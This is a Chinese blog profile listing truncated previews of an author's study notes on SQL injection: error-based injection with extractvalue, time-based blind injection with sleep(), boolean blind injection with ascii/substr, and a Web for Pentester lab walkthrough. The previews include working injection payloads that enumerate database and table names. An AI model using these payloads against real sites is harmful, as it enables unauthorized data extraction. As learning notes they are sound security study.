sql
Long_gone
这个作者很懒,什么都没留下…
展开
-
sql注入的报错注入笔记
报错注入之一 extractvalue1. 爆库?id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+2.爆表?id=1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.table...原创 2019-12-19 17:50:04 · 493 阅读 · 0 评论 -
sql注入时间盲注笔记
1.判断是否存在注入,注入是字符型还是数字型输入1’ and sleep(5) #,感觉到明显延迟;输入1 and sleep(5) #,没有延迟;说明存在字符型的基于时间的盲注。2.猜解当前数据库名首先猜解数据名的长度。1’ and if(length(database())=1,sleep(5),1) # 没有延迟1’ and if(length(database())=2,sl...原创 2019-12-19 17:47:51 · 476 阅读 · 0 评论 -
sql注入盲注笔记
1. 先猜一下数据库的字符长度?id= 1’ and length(database())=1 (2,3,4…) --+ 其他两个盲注函数 left mid(需要重复操作)2. 确定字符长度后,挨个猜字符,由此爆出库名?id= 1’ and ascii(substr(database(),1,1))>97 (ascii码的十进制的对应数)–+(需要重复操作)3. 爆出库名...原创 2019-12-19 17:43:41 · 275 阅读 · 0 评论 -
Web for pentester靶机sql注入
Example 1这关进来以后是这样的:从这个页面中我们可以得到name就是注入点,所以就先判断出它的闭合方式,经过尝试发现它是由单引号闭合的,知道闭合方式以后就开始判断它的字段数了:' order by 5 --+经过尝试,确定它的字段数为5,然后就可以开始注入了,使用最常用的联合注入即可:' union select 1,2,3,4,5 --+' union selec...原创 2019-10-22 20:37:06 · 700 阅读 · 0 评论